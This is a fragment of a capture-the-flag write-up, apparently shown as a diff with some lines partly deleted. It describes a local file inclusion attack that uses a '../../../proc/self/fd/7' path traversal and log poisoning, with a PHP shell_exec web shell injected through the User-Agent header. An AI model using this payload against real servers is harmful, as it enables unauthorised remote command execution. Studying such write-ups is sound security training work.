 http://web.euristica.in/R3M3MB3R/index.php?f=../../../proc/self/fd/7

-PHP code could be injected in each of these logs files using different ways, but to get the flag I used access.log.
+.
 They had a few issues with that file during the CTF.
 It was removed at some point, then was blocked, then was cleared every 30 seconds or so, and that’s how it stayed until the end I believe.
-I injected PHP in the page by modifying my User-Agent header with Burp:

 User-Agent: <?php echo shell_exec($_REQUEST['cmd']); ?>

-A simple ls revealed where the flag was: phpinfo
+revealed where the flag was:

 And you could then directly access it: